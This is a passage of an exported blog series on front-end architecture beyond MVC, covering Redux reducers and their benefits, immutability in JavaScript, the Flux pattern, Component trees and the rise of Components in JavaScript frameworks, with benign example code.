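store.dispatch(incrementCounter()); // Laps walked: 2
store.dispatch(decrementCounter()); // Laps walked: 1
</code>
</pre>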
The full example can be found here: <a href="http://codepen.io/anon/pen/oxqEpd?editors=0010">http://codepen.io/anon/pen/oxqEpd?editors=0010</a><br />
<br />
In the counter example the state was simply a number which was either incremented or decremented. Let's look at a more complex example: an application which has multiple counters, and has a total count for all counters combined.<br />
<pre><code class="javascript">
// Initially there will be zero counters
const initialState = { counters: {}, nextCounterId: 0, totalCount: 0 };
// Define the actions for adding and removing counters.
const CREATE_COUNTER = "CREATE_COUNTER";
const REMOVE_COUNTER = "REMOVE_COUNTER";
// Defines the actions on a counter.
const INCREMENT_COUNTER = "INCREMENT_COUNTER";
const DECREMENT_COUNTER = "DECREMENT_COUNTER";
// Create the store with the reducer and the initial state.
let store = Redux.createStore(counterApp, initialState);
// The reducer for the multi-counters application.
function counterApp(state, action) {
  switch(action.type) {
    case CREATE_COUNTER:
      // Copy the state, including the nested counters object, so the old state is never mutated.
      var nextState = Object.assign({}, state, { counters: Object.assign({}, state.counters) });
      nextState.nextCounterId = state.nextCounterId + 1;
      nextState.counters[state.nextCounterId] = {
        count: 0,
        counter: state.nextCounterId
      };
      return nextState;
    case REMOVE_COUNTER:
      // Copy the state and its counters.
      var nextState = Object.assign({}, state, { counters: Object.assign({}, state.counters) });
      delete nextState.counters[action.counter];
      nextState.totalCount = calculateTotalCount(_.values(nextState.counters));
      return nextState;
    case INCREMENT_COUNTER:
      // Copy the state, its counters, and the individual counter before changing its count.
      var nextState = Object.assign({}, state, { counters: Object.assign({}, state.counters) });
      nextState.counters[action.counter] = Object.assign({}, state.counters[action.counter]);
      nextState.counters[action.counter].count += 1;
      nextState.totalCount = calculateTotalCount(_.values(nextState.counters));
      return nextState;
    case DECREMENT_COUNTER:
      // Copy the state, its counters, and the individual counter before changing its count.
      var nextState = Object.assign({}, state, { counters: Object.assign({}, state.counters) });
      nextState.counters[action.counter] = Object.assign({}, state.counters[action.counter]);
      nextState.counters[action.counter].count -= 1;
      nextState.totalCount = calculateTotalCount(_.values(nextState.counters));
      return nextState;
  }
  return state;
};
// Function to calculate the total count
function calculateTotalCount(counters) {
  return counters.reduce((total, counter) => total + counter.count, 0);
}
/* Action creator functions: functions that create Redux actions */
function incrementCounter(counter) {
  return {
    type: INCREMENT_COUNTER,
    counter: counter
  };
}
function decrementCounter(counter) {
  return {
    type: DECREMENT_COUNTER,
    counter: counter
  };
}
function createCounter() {
  return {
    type: CREATE_COUNTER
  };
}
function removeCounter(counter) {
  return {
    type: REMOVE_COUNTER,
    counter: counter
  };
}
</code>
</pre>
Note that Object.assign is used to make a copy of the state object, and of the nested counters object, before anything is changed. Remember we never want to mutate the 'old' state directly since this is impure.<br />
<br />
The full example can be found here: <a href="http://codepen.io/anon/pen/wGmjxx?editors=0010">http://codepen.io/anon/pen/wGmjxx?editors=0010</a><br />
<h2>
Benefits of Redux</h2>
Since Redux is Flux-like, all benefits of Flux are also benefits of Redux; see <a href="http://dontpanic.42.nl/2016/07/enter-the-flux.html" target="_blank">last week's</a> post. The reverse is not true:<br />
<br />
The benefits of Redux are the benefits of having a singular store with one variable holding the entire state. This enables a lot of cool functionality.<br />
<br />
<h3>
Time Travel Debugging</h3>
One benefit is Time Travel Debugging, which means you can go back to a previous state whenever you want, and forward again.<br />
<br />
This is possible due to the nature of Redux's pure reducer functions. The state is always copied and never directly mutated, this means you can keep an array of the previous states. If you want to go back to a certain state from the array you can simply assign it to the current state.<br />
<br />
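A minimal sketch of the idea (the real devtools are more sophisticated, and the 'JUMP_TO_STATE' action below is hypothetical) could look like this:<br />
<pre><code class="javascript">
// Keep every state the store ever produced.
var history = [];
store.subscribe(function() {
  history.push(store.getState());
});

// A wrapping reducer that understands a special action for jumping back.
function counterAppWithTimeTravel(state, action) {
  if (action.type === 'JUMP_TO_STATE') {
    return action.state;
  }
  return counterApp(state, action);
}

// 'Travelling back in time' is then just re-dispatching an old state,
// assuming the store was created with counterAppWithTimeTravel.
function timeTravelTo(index) {
  store.dispatch({ type: 'JUMP_TO_STATE', state: history[index] });
}
</code>
</pre>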
There is a Chrome plugin which builds a debugger into the devtools: <a href="https://github.com/zalmoxisus/redux-devtools-extension">https://github.com/zalmoxisus/redux-devtools-extension</a>. If you want to play with time travel debugging yourself make sure the plugin is installed and check out the examples.<br />
<br />
<h3>
Hot reloading</h3>
Another benefit is so called hot reloading.<br />
<br />
Normally when you work on a Component you will have to reload the page every time the Component is changed to see the code changes effects. Some development systems can automate this task by watching the file system for you.<br />
<br />
Hot reloading goes one step further. Hot reloading will change the Component without reloading the page and playback all events to get the Component in the correct state. This means that you will see your code changes immediately reflected in your browser, without losing the state of the page.<br />
<br />
See it in action here: <a href="http://gaearon.github.io/react-hot-loader/">http://gaearon.github.io/react-hot-loader/</a><br />
<br />
<h3>
Server Side Rendering</h3>
The third benefit of Redux's approach to state is that it is easier to do server side rendering via Universal JavaScript. Universal JavaScript is the idea that the same code you run on the browser can be run on a <a href="https://nodejs.org/">Node.js</a> server as well.<br />
<br />
The idea is simple: you use a Node.js server to run your JavaScript code which generates the HTML, using the same code which normally runs on the browser. The HTML is sent over the network to the browser, the browser will then display the page as it normally does. The user will see the page instantly as soon as it is loaded, giving a better User Experience. Web crawlers such as Google and Bing can crawl the page too which helps your rankings.<br />
<br />
The JavaScript is still also sent to the browser. It will start up and detect that there is already an initial state, as sent by the server. The JavaScript will then start up and make the page dynamic again. This process of 'attaching' to the HTML is called hydration.<br />
<br />
The reason this is easy to do with Redux is because the state is in one single Store. Creating the HTML is a function of: `application(initialState) => HTML` regardless of architecture. In Redux to set the initial state you simply assign a single value to the Store, making this process easier.<br />
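<br />
For example, on the client side the only Redux-specific step is creating the store with the state the server embedded in the page (window.__PRELOADED_STATE__ is a common convention, not a Redux API):<br />
<pre><code class="javascript">
// The server rendered the HTML and embedded the state it used, e.g.:
//   <script>window.__PRELOADED_STATE__ = {"counters": {}, "nextCounterId": 0, "totalCount": 0};</script>
// The client then simply starts its store from that exact same state.
const preloadedState = window.__PRELOADED_STATE__ || initialState;
let store = Redux.createStore(counterApp, preloadedState);
</code>
</pre>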
<h2>
Cons of using Redux</h2>
<h3>
We are not in Kansas anymore</h3>
Redux has a weakness: it is not always easy to learn. Immutable, Pure Functions, Reducers, Dispatchers, Thunks, etc etc.<br />
<br />
While all of these things are not that difficult to learn, there are many of them. Thinking about Components and applications with these new concepts requires you to learn a new philosophy, and a different way of doing things.<br />
<br />
The pay-off for learning these, however, is immense. They give you a completely new look at how state can be managed.<br />
<br />
<h3>
Immutability</h3>
The basic principle of Redux is relatively easy to learn. Each action can be seen as a function which takes the old state and returns a new state: `newState = action(oldState)`.<br />
<br />
However, there is one important caveat: you cannot mutate the oldState, instead you must always create an entirely new state. Otherwise the goodies such as time travel debugging and hot reloading will not work. This means that you as a developer must be constantly aware of the fact that you must not mutate the state.<br />
<br />
It would be really handy if variables in JavaScript were immutable. A variable is immutable if the state of that variable cannot be changed. The benefit of immutability is that you never have to be afraid of something changing a variable's value.<br />
<br />
For example:<br />
<pre><code class="javascript">
/*
  Let's say we have an array of names and we want to print them
  to the console joined by a comma.
*/
var names = ["Kwik", "Kwek", "Kwak"];
/*
  This function printArrayJoined comes from some external library.
  We think this function just prints the names joined by a comma.
  Unbeknown to us the printArrayJoined actually mutates the array!
  At the end of this function it will be empty.
*/
function printArrayJoined(array) {
  var out = '';
  var length = array.length;
  while(length !== 1) {
    out += array.shift() + ", ";
    length -= 1;
  }
  out += array.shift();
  console.log(out);
}
printArrayJoined(names); // prints "Kwik, Kwek, Kwak"
// At this point the names array is empty. Not what we expected.
console.log(names); // prints []
</code>
</pre>
You can see it work here: <a href="http://codepen.io/anon/pen/aNxZex?editors=0011">http://codepen.io/anon/pen/aNxZex?editors=0011</a><br />
<br />
The printArrayJoined function mutated the array, which was unexpected. Had printArrayJoined been defined as:<br />
<pre><code class="javascript">
function printArrayJoined(array) {
  var out = array.join(', ');
  console.log(out);
}
</code>
</pre>
Everything would be fine, as 'join' is not a mutating function: it does not alter the array in any way. You can see it live here: <a href="http://codepen.io/anon/pen/GZLjKj?editors=0011">http://codepen.io/anon/pen/GZLjKj?editors=0011</a><br />
<br />
In languages such as <a href="http://elm-lang.org/" target="_blank">Elm</a>, which is a big inspiration for both React and Cycle.js, or <a href="https://clojure.org/" target="_blank">Clojure</a> immutability is built right into the language itself. In JavaScript this is not the case.<br />
<br />
When writing Redux reducers you must be constantly aware of what you are writing to make sure you are not mutating state.<br />
<br />
Redux has a great philosophy about how to manage state but unfortunately the language JavaScript does not make it easy to adhere to it. You will at times fight the language when writing reducers.<br />
<br />
You could however use a library such as <a href="https://facebook.github.io/immutable-js/">Immutable.js</a> to get immutable collections, though that does come at the expense of having yet another abstraction.<br />
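<br />
For example, with an Immutable.js List every 'mutating' operation returns a new collection and the original is left alone:<br />
<pre><code class="javascript">
var names = Immutable.List(["Kwik", "Kwek", "Kwak"]);
var more = names.push("Kwok");

console.log(names.size); // 3, the original List is untouched.
console.log(more.size);  // 4, push returned a brand new List.
</code>
</pre>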
<h2>
Resources</h2>
The inventor of Redux, Dan Abramov, has a great video showing off time travel debugging and Hot Reloading: <a href="https://www.youtube.com/watch?v=xsSnOQynTHs">https://www.youtube.com/watch?v=xsSnOQynTHs</a>.<br />
<br />
He also has a great free course on <a href="https://egghead.io/series/getting-started-with-redux" target="_blank">egghead</a> about how to get started with Redux.<br />
<h2>
Reactive Programming</h2>
Now that we have seen Redux, the most used Flux-like library, it is time to look at a new architecture in the coming weeks.<br />
<br />
One of the criticisms of React is that it is not truly reactive, even though the name 'React' suggests it, and that Reactive Programming would be a better model.<br />
<br />
<a href="http://dontpanic.42.nl/2016/07/reactive-programming.html">Next week</a> we will take a look at Reactive Programming and see what the fuss is all about.<br />
<div>
<br /></div>
Anonymousnoreply@blogger.com3tag:blogger.com,1999:blog-8962763253387334081.post-54001376153262019272016-07-07T17:28:00.000+02:002016-07-15T09:59:25.764+02:00Post-MVC part 4: Enter the Flux<h2>
Intro</h2>
<div>
<div>
<a href="http://dontpanic.42.nl/2016/06/post-mvc-age.html" target="_blank">Last week</a> we discovered that Component based applications are trees. We saw that Components can only communicate one level up the tree and one level down. If a Component wants to communicate with his 'siblings' he will have to do that via his parent.</div>
<div>
<br /></div>
<div>
We also learned that the state of the application resides in the Components, but that it is not always apparent where the state should live.</div>
<div>
<br /></div>
<div>
The intercommunication between Components and the location of the state can make Component based applications complex. This week we are going to look into an architecture called 'Flux' in order to see how this complexity can be tackled.</div>
</div>
<h2>
Enter the Flux</h2>
<div>
<div>
<a href="https://facebook.github.io/react/" target="_blank">React</a> is a Component based View library from Facebook. It popularized the Component based approach and made it mainstream.</div>
<div>
<br /></div>
<div>
Facebook at some point <a href="https://facebook.github.io/flux/docs/overview.html#content" target="_blank">discovered</a> the weakness of traditional MVC and created a new way of managing state. They created Flux, an architecture that uses a unidirectional data flow.<br />
<br />
<a href="http://2.bp.blogspot.com/-6qIy26Jur2E/V3508RbcYVI/AAAAAAAAAE0/4XKyCOD6IrA4a1IiUZZdSwAYcabzOXqOgCK4B/s1600/flux-react.png" imageanchor="1"><img border="0" src="https://2.bp.blogspot.com/-6qIy26Jur2E/V3508RbcYVI/AAAAAAAAAE0/4XKyCOD6IrA4a1IiUZZdSwAYcabzOXqOgCK4B/s1600/flux-react.png" /></a></div>
</div>
<div>
<a name='more'></a></div>
<h2>
What the Flux</h2>
<div>
<div>
Traditional MVC is bi-directional which means that the Model, View and Controller can communicate with each other. This is also the same for the Component architecture we saw last week.</div>
<div>
<br /></div>
<div>
Flux advocates having a unidirectional data flow, meaning that all state flows one way, from the top to the bottom. We still have a Tree of Components like before, but Flux will handle the intercommunication and storing the state.</div>
<div>
<br /></div>
<div>
Lets look at the various concepts in the Flux architecture.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
Store</h3>
<div>
<div>
A Store contains logic and data and acts as the 'store' for a particular domain. For example in a Todo MVC application we would have a store for the Todo's. The TodoStore would then know how to add a Todo and keep track of the list of Todo's.</div>
<div>
<br /></div>
<div>
By having a Store the location of the 'state' is very transparent. The need for a particular Component to internalize the state is no longer needed. The decision we had to make last week between storing the todo's in either the TodoList or the TodoApplication is moot.</div>
<div>
<br /></div>
<div>
Multiple stores can be made for the various entities in your domain.</div>
<div>
<br /></div>
<div>
Stores register themselves to the 'Dispatcher' to receive actions which originate from the views. Let's look at the views before looking at the Dispatcher.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
View and Controller-Views</h3>
<div>
<div>
Flux has two types of Views: the regular View and the Controller-View. Behind the scenes they are simply regular Components; the distinction is in their behavior.</div>
<div>
<br /></div>
<div>
The normal views are just regular Components representing a kind of graphical widget. The Controller-Views are views that register to the various stores to receive callbacks for when the data in the store changes. Their job is to provide the normal views with the data they need to correctly render; they help keep the normal views easy to understand.</div>
<div>
<br /></div>
<div>
For example in a Todo application we have a TodoListComponent which is a Controller-View: it registers itself to changes from the TodoStore. The TodoListComponent in turn renders TodoComponents, which are regular Views. The TodoComponent will be composed out of multiple other subcomponents which are regular views. The TodoListComponent is more complex, as it listens to the store, but it helps keep the other subcomponents plain and simple.</div>
<div>
<br /></div>
<div>
So a Controller-View helps render the state from a Store. But how is the state from a store manipulated? The answer is via Actions, which are created when an event occurs on a view, for example when a button is clicked or an input field is filled in. The view will then dispatch an action to the dispatcher.</div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3>
Dispatcher</h3>
<div>
<div>
The dispatcher's job is to receive the actions and route them to the correct Stores. The Stores register themselves to the dispatcher so they can receive actions via callbacks. A Store can then act on a particular Action.</div>
<div>
<br /></div>
<div>
Note that there is only one Dispatcher per application. You could say that it is a <a href="http://www.blackwasp.co.uk/Singleton.aspx" target="_blank">singleton</a>. The Dispatcher itself contains no business logic, its job is to simply route and receive actions.</div>
<div>
<br /></div>
<div>
For example a view could dispatch an AddTodo action which is a simple object such as:</div>
</div>
<pre><code class="javascript">
{
  type: 'ADD_TODO',
  text: 'Buy groceries.'
}</code></pre>
<div>
<br />
The dispatcher will inform the stores via callbacks. A TodoStore could listen to this event like so:</div>
<pre><code class="javascript">
var todoStore = [];
Dispatcher.register(function(action) {
  if (action.type === 'ADD_TODO') {
    todoStore.push({complete: false, text: action.text});
  }
});
</code></pre>
<div>
<br />
In the view (Component) which represents the list of Todo's, the new Todo will then be shown.<br />
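The store can notify the Controller-Views in a similar callback style. As a minimal sketch (the change listener mechanism and the renderTodoList function below are hypothetical; real Flux stores typically use an EventEmitter for this), the TodoStore from above could be extended like so:<br />
<pre><code class="javascript">
var todoStore = [];
var changeListeners = [];

Dispatcher.register(function(action) {
  if (action.type === 'ADD_TODO') {
    todoStore.push({complete: false, text: action.text});
    // Tell every registered Controller-View that the store has changed.
    changeListeners.forEach(function(listener) { listener(); });
  }
});

// The TodoList Controller-View registers itself and re-renders on change.
changeListeners.push(function() {
  renderTodoList(todoStore);
});
</code>
</pre>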
<h2>
Benefits of Flux</h2>
</div>
<div>
<div>
<div>
One benefit of Flux is that the 'action' is decoupled from the 'store'. This makes it possible to send the same action to the dispatcher from different Components and have it handled in exactly the same way.</div>
</div>
<div>
<br /></div>
<div>
Imagine that in our Todo application there are three ways to add a new todo:</div>
</div>
<div>
<ol>
<li>A new Todo input and button, aka the normal way to add a todo.</li>
<li>A duplicate Todo button next to an existing Todo.</li>
<li>A group of buttons for quickly adding predefined Todo's.</li>
</ol>
<div>
<div>
These three Components will all send the exact same action to the dispatcher. The TodoStore will add the new Todo to the array when the event occurs. The TodoStore is not aware of the origin of the action, and the Components sending the actions are not aware of what happens when the actions are received. In other words the producer of the action is not coupled to the consumer of the action.
<div>
</div>
<div>
<br /></div>
<div>
Because they are decoupled we get some freedom to refactor the code of the producer without affecting the consumer or vice versa. In the example the todo's were kept in an array. If for some reason we would want to keep them in another data-structure we would change the Store, but not all components listening to them.</div>
<div>
<br /></div>
<div>
This also works the other way around. If we decide that the duplicate Todo button is not useful we can remove it without having to update the store, or the dispatcher.</div>
<div>
<br /></div>
<div>
Conceptually unidirectionality is easier to understand too. The constraint that 'state' flows down makes it easy to reason about where the state came from. When you are working on a Component such as the TodoComponent you know that the Todo itself came from above.</div>
<div>
<br /></div>
<div>
When you want to trigger an event from a Component you simply dispatch it via the Dispatcher; you do not have to worry about how to 'reach' a cousin component. No 'indirect' relationships in the Tree of Components exist; such indirect relationships make understanding the whole application more difficult.</div>
</div>
</div>
<h2>
Variations of Flux</h2>
<div>
<div>
When Flux was announced by Facebook they explained the idea of Flux but did not provide an actual library or framework for using Flux. Flux was so compelling however that multiple implementations started popping up. Such as <a href="https://github.com/acdlite/flummox" target="_blank">Flummox</a>, <a href="http://alt.js.org/guide/" target="_blank">Alt</a>, <a href="https://github.com/reflux/refluxjs" target="_blank">Reflux</a> etc etc.</div>
<div>
<br /></div>
<div>
Each variation would do things slightly differently compared to the original Flux architecture. But soon a new contender for the crown entered the stage: <a href="https://github.com/reactjs/redux/" target="_blank">Redux</a>.</div>
<div>
<br /></div>
<div>
It took the ideas of Flux and improved upon them, it is currently the most popular Flux derivative out there, <a href="http://dontpanic.42.nl/2016/07/redux.html">next week</a> we will discover why.</div>
</div>
Anonymousnoreply@blogger.com5tag:blogger.com,1999:blog-8962763253387334081.post-5772764590239058872016-06-30T19:24:00.000+02:002016-07-07T17:29:06.881+02:00Post-MVC part 3: Post-MVC Age<h2>
Intro</h2>
<div>
<div>
<a href="http://dontpanic.42.nl/2016/06/post-mvc-mvc-and-javascript.html" target="_blank">Last week</a> we learned that the various MVC frameworks all share the same abstraction called the Component, and that the Component is a tiny MVC application wrapped in one construct. More and more frameworks are using Components all the way down; this week we learn how an application which only uses Components works.</div>
<div>
<br /></div>
<div>
I call this the Post-MVC Age. </div>
<h2>
Post-MVC Age</h2>
<div>
If we built our front-end applications entirely with Components instead of using MVC, how would that work? In this post I want to show you how to do just that. We will also discover some of the weaknesses of the Component model regarding state.</div>
</div>
<div>
<a name='more'></a><h2>
Applications are Trees</h2>
</div>
<div>
<div>
Lets start at the beginning: given that our application is written with Components we must define the "first" Component. This Component represents the "entire" application. Of course this Component is composed out of other Components which will in turn be composed of Components.</div>
<div>
<br /></div>
<div>
The application will be Components all the way down.</div>
</div>
<div>
<br /></div>
<div>
<div>
Basically a Component based application is a Tree. A Tree of components. The 'first' Component can be viewed as the root Component: the starting point of the tree. Each sub Component is a node inside of that tree.</div>
<div>
<br /></div>
<div>
Lets imagine a simple Todo List application. The tree would look something like this:</div>
</div>
<div>
<br /></div>
<pre>TodoApplication
├── AddTodo
│   ├── Input
│   └── Button (add todo)
├── TodoList
│   └── Todo
│       ├── Toggle
│       └── Button (trash)
└── Filters
    ├── Filter (all)
    ├── Filter (complete)
    └── Filter (active)
</pre>
<br />
The TodoApplication is the root Component. All other Components are directly descendant of this Component.<br />
<br />
The AddTodo Component is responsible for adding Todo's behind the scenes; it is an Input with a submit button.<br />
<br />
The TodoList component renders the current todos, it does so by rendering each todo via the Todo Component using a loop. The Todo Component has a button to toggle the Complete status of the Todo, and a button to remove the todo completely.<br />
<br />
The Filters component renders a list of 'filters' which the user can use to filter the todo's. There is a filter for showing all todos, a filter for showing all complete todos, and a filter for showing all active (non complete) todos.<br />
<h2>
The Tree and the State</h2>
<div>
<div>
But what about the state of the application? Where do the todos actually live? Somewhere an array of todos must be kept as the internal state of a Component. If you look at the tree you might think it would be either the TodoApplication or the TodoList Component.</div>
</div>
<div>
<br /></div>
<div>
<div>
Let's investigate both options. However, it is important to keep in mind that a Component can only communicate one level up or one level down in the tree. Remember a Component is an island which has very specific communication channels. If a Component wants to 'talk' to a sibling he must do so via the parent. If a Component wants to 'talk' to his grandchild he must do so via his own child Component.<br />
<br /></div>
</div>
<h3>
The TodoApplication Component</h3>
<div>
<div>
Option A is in the TodoApplication:</div>
<div>
<br /></div>
<div>
If the TodoApplication Component holds the todos then they can then be passed down to the TodoList component. When a filter is clicked it reports it back to the TodoApplication Component, where the todos can immediately be filtered. When the AddTodo's submit button is clicked he communicates it back directly to the TodoApplication via an event. This event can then hold the text of the todo the user entered.<br />
<br /></div>
</div>
<h3>
The TodoList Component</h3>
<div>
<div>
Option B is in the TodoList:</div>
<div>
<br /></div>
<div>
The TodoList Component can keep the actual reference to the todos. When a filter is clicked it reports it to the TodoApplication which routes the event to the TodoList. Same for the AddTodo Component when a todo is added: a call is made to the TodoApplication which routes it back to the TodoList.</div>
</div>
<h2>
Lots of little Channels, lots of little States</h2>
<div>
<div>
Given the two options, which one would be the best? I think the answer may be that neither solution is optimal.</div>
<div>
<br /></div>
<div>
The problem with both solutions is that the state of the application as a whole is difficult to reason about, because each Component internalizes a part of the state. Where does the active filter live? Where do the todos live? There are lots of little islands which have lots of little pieces of state.</div>
</div>
<div>
<br /></div>
<div>
<div>
In both solutions multiple events are routed through Components without them actually doing anything with them except to pass them on. This makes events very difficult to trace through the tree. There are too many channels producing too much noise.</div>
</div>
<div>
<br /></div>
<div>
<div>
Whilst each Component is still relatively easy to understand in isolation, the whole picture is blurred. The reason for this is that Components are talking to each other in a bi-directional manner. </div>
<div>
<br /></div>
<div>
In short information is flowing all over the place.</div>
</div>
<h2>
We need to talk about state</h2>
<div>
<div>
One of the downsides of the traditional MVC pattern is that state was difficult to manage, because state manipulation could happen in multiple places. </div>
<div>
<br /></div>
<div>
This downside also appears in the Component only model: state is difficult to manage, but not for the same reasons as in MVC. The reason is that there is communication between components which goes in both directions and sometimes through multiple components.</div>
<div>
<br /></div>
<div>
So whilst a Component itself is still easy to understand. The whole application is a complex web of communication. In the <a href="http://dontpanic.42.nl/2016/07/enter-the-flux.html" target="_blank">next weeks</a> we will look into the various strategies that the community came up with to tackle this complexity.</div>
</div>
Anonymousnoreply@blogger.com3tag:blogger.com,1999:blog-8962763253387334081.post-17931155920874396492016-06-23T16:12:00.000+02:002017-04-22T11:32:08.477+02:00Post-MVC part 2: MVC and JavaScript<h2>
Intro</h2>
<div>
<div>
<a href="http://dontpanic.42.nl/2016/06/post-mvc-we-need-to-talk-about-state.html" target="_blank">Last week</a> we discussed what MVC is and how it was used to render application and websites from the server. But our application's user interfaces became too ambitious and our code became spaghetti. This week we will discuss MVC and JavaScript, and the birth of the Component.</div>
</div>
<h2>
MVC and JavaScript</h2>
<div>
<div>
Taking full control of the UI meant things had to be programmed on the browser side. Meaning that things had to be programmed in JavaScript.</div>
<div>
<br /></div>
<div>
This gave rise to the era of the browser based MVC frameworks. <a href="http://backbonejs.org/" target="_blank">Backbone</a> was the early pioneer showing us that we could straighten our jQuery Spaghetti. <a href="https://angularjs.org/" target="_blank">Angular</a> and <a href="http://emberjs.com/" target="_blank">Ember</a> improved upon Backbone by giving us automatic bindings: when the model changed, the views were automatically updated.</div>
<div>
<br /></div>
<div>
Backbone, Ember, Angular are all MVC frameworks, which took the tried and true architectural pattern, and allowed us to make great applications.</div>
<div>
<br /></div>
<div>
And for a while everything was good.<br />
<br />
<a name='more'></a></div>
</div>
<h2>
Trouble in paradise</h2>
<div>
<div>
But there was trouble brewing in paradise.</div>
<div>
<br /></div>
<div>
MVC comes with a particular problem: it is very difficult to reason about what is going on in a larger application. Once you have multiple Controllers and Views which manipulate the same Model things get confusing. </div>
<div>
<br /></div>
<div>
Imagine an application for buying and selling groceries, which has a model for the 'shopping cart' of what the user wants to order. The model for the shopping cart can be manipulated in various ways:</div>
<div>
<ol>
<li>Opening the shopping cart detail page and removing items.</li>
<li>Opening a product detail page and pressing 'add to cart'</li>
<li>Clicking on special banners giving personalized discounts.</li>
</ol>
</div>
<div>
Each of these three ways has its own View and Controller, but they all share the same Model of the shopping cart. If you were to create a graph of the relationships between these objects you would find that things get very complex.</div>
<div>
<br /></div>
<div>
Each new View and Controller adds ways in which the state of the model can be manipulated. Trying to mentally understand the shopping cart's state and how it can be influenced becomes difficult if not impossible. If a bug triggers things to be added to the cart twice, where do we look? It could be in any of the three controllers and views that influence the shopping cart.</div>
<div>
<br /></div>
<div>
The 'shopping cart' example shows how a Model for a single entity can be difficult to manage. Imagine a situation where multiple entities can affect each other; the mental gymnastics you would need to perform to keep the whole picture in your head would be heroic.</div>
<div>
<br /></div>
<div>
To figure out how we can solve this problem we need to make a detour.</div>
</div>
<h2>
Abstracting Views</h2>
<div>
<div>
Consider what a view is. A view normally shows a bunch of widgets on the screen for the user to interact with. A button here, a table there and some input elements on the side. We can use them to manipulate and view the Model.</div>
<div>
<br /></div>
<div>
In our applications we almost never use the basic HTML widgets as is. We style them using CSS to change their appearance. We also give them new behaviors such as an auto-complete functionality. Sometimes we even create completely new Widgets such as a 'Maps' widget to show a geographical location.</div>
<div>
<br /></div>
<div>
Of course we abstract these widgets away into reusable code. In Angular we might make a bunch of directives. In Ember we would create Components. They have different names but they represent the same principle.</div>
<div>
<br /></div>
<div>
Our Views are basically built using regular HTML and these widget abstractions the various MVC frameworks provide.</div>
<div>
<br /></div>
<div>
The common term for these abstractions is "Component".</div>
</div>
<h2>
The birth of the Component</h2>
<div>
<div>
A Component is like an island. It has nothing to do with the outside world and, as such, will not affect it. This means you can use the same Component multiple times in the same View without the instances interfering with each other.</div>
<div>
<br /></div>
<div>
Since a Component is isolated from the rest of the system, if you want to interact with the Component you must send messages to it. The same is true the other way around: if the Component wants to talk to the outside world he must send messages to the outside as well.</div>
<div>
<br /></div>
<div>
The great benefit of having isolated components is that they are easy to reason about: to understand how a component works you can study just the component's source. If you know a component's incoming and outgoing messages you understand how to use the component.</div>
<div>
<br /></div>
<div>
There is a proposal to make Components natively available in the web, called "<a href="http://webcomponents.org/" target="_blank">Web Components</a>". The proposal is to make it possible for us to create truly isolated components with their own tags.</div>
</div>
<h2>
Study of a Google Maps Component in Polymer</h2>
<div>
<div>
Google Maps is a service by Google which shows geographical maps in the browser. Using <a href="https://www.polymer-project.org/1.0/" target="_blank">Polymer</a>, which is a framework made by Google to create web components, Google made a <a href="https://elements.polymer-project.org/elements/google-map" target="_blank">component for Google Maps</a>:</div>
<div>
<br /></div>
<div>
To use the Component we write the following HTML:<br />
<pre><span style="font-family: "courier new" , "courier" , monospace;"><google-map fit-to-markers="" latitude="37.77493" longitude="-122.41942">
<google-map-marker draggable="true" latitude="37.779" longitude="-122.3892" title="Go Giants!">
</google-map-marker>
</google-map></span></pre>
If you study the code snippet above it is easy to guess what the Component does. It creates a google-map widget centered on a particular longitude and latitude but is wide enough to fit all markers. Inside the map there is a marker on a coordinate which is draggable and has the title: 'Go Giants'.<br />
<br />
The point is that a Component is very declarative in use. You don't write how you want something to get done, you write what you want the end result to be.<br />
<br />
The Google Maps Component itself can be very complex. I imagine that it is certainly not trivial to implement the code behind it. However the usage of the component is not difficult at all, it has a very simple interface.<br />
<br />
To communicate to the component that we want another latitude and longitude we simply change the attributes on the <google-map> element. The same goes for the title of the marker.<br />
<br />
If the Component wants to communicate with us we must listen to the correct channel. A component in Polymer communicates through events. For example to listen to a click on the map:<br />
<br />
<pre><code class="javascript">var map = document.querySelector('google-map');
map.addEventListener('google-map-click', function(e) {
alert('The user clicked on the Map!');
});</code>
</pre>
The channel in this case would be the 'google-map-click' string. With it we tell the Google Map Component that we are interested in this type of event. The callback function lets us 'do our thing' when that event actually occurs. The Component however stays responsible for determining when the event takes place. The Component calls the outside world.<br />
<br />
The concept of Components are implemented in various frameworks such as: <a href="https://facebook.github.io/react/docs/component-api.html" target="_blank">React</a>, <a href="https://angular.io/docs/ts/latest/guide/architecture.html" target="_blank">Angular 2.0</a>, <a href="http://emberjs.com/api/classes/Ember.Component.html" target="_blank">Ember</a> and <a href="https://www.polymer-project.org/1.0/docs/devguide/feature-overview.html" target="_blank">Polymer</a>. A Component's "code" will be different in each framework, but they follow the same principles: isolation, declarative interfaces, and explicit channels of communication.<br />
<h2>
A realization about Components</h2>
</div>
</div>
<div>
<div>
A Component has behaviors and a look and feel; it also has state. For example: a button component can be enabled or disabled, and a person component shows a certain person's details; the person which is shown is the state.</div>
<div>
<br /></div>
<div>
Reading the above paragraph it might dawn upon you that a Component is in some ways a version of MVC, but on a much smaller level. A Component has behaviors which map to the Controller. A Component has a look and feel which maps to the View. A Component has some state which maps to the Model.
<div>
</div>
<div>
<br /></div>
<div>
Can a Component do anything a normal MVC pattern can do? The answer is yes. And if a Component can do anything a normal MVC pattern can do, why do we still use traditional MVC? Why not go all in with Components? They are more declarative, they are easier to reason about because they live in isolation, and they fit in one single file.</div>
<div>
<br /></div>
<div>
But what about the View that ties all Components together, surely we need that? The answer is no. You can define Components in terms of other Components, using them as building blocks to create new abstractions. This capability can completely replace the traditional View, as the sketch below shows.</div>
<div>
<br /></div>
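<div>
As a purely hypothetical sketch, in Angular 1.5 syntax, the 'shopping' screen from the earlier example could itself be a Component whose template is nothing but other Components used as building blocks:</div>
<pre><code class="javascript">
angular.module('shopApp', [])
.component('shopPage', {
  // No separate View: the page is just a Component composed of other
  // (hypothetical) Components.
  template: `
    <discount-banner></discount-banner>
    <product-detail></product-detail>
    <shopping-cart></shopping-cart>
  `
});
</code>
</pre>
<div>
<br /></div>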
<div>
This realization was the beginning of the Post-MVC Age. Which is the topic of <a href="http://dontpanic.42.nl/2016/06/post-mvc-age.html" target="_blank">next week's post</a>. In that post we will try to discover how an application that uses only Components works.</div>
</div>
Anonymousnoreply@blogger.com4tag:blogger.com,1999:blog-8962763253387334081.post-19354003021926445362016-06-16T12:00:00.000+02:002016-06-23T16:31:37.465+02:00Post-MVC part 1: We need to talk about MVC <h2>
Intro</h2>
<div>
<div>
In this series of blog posts I want to take a look past traditional MVC for the front-end. There have been lots of developments in architectures that do not look like MVC at all such as Flux and Reactive Programming.</div>
<div>
<br /></div>
<div>
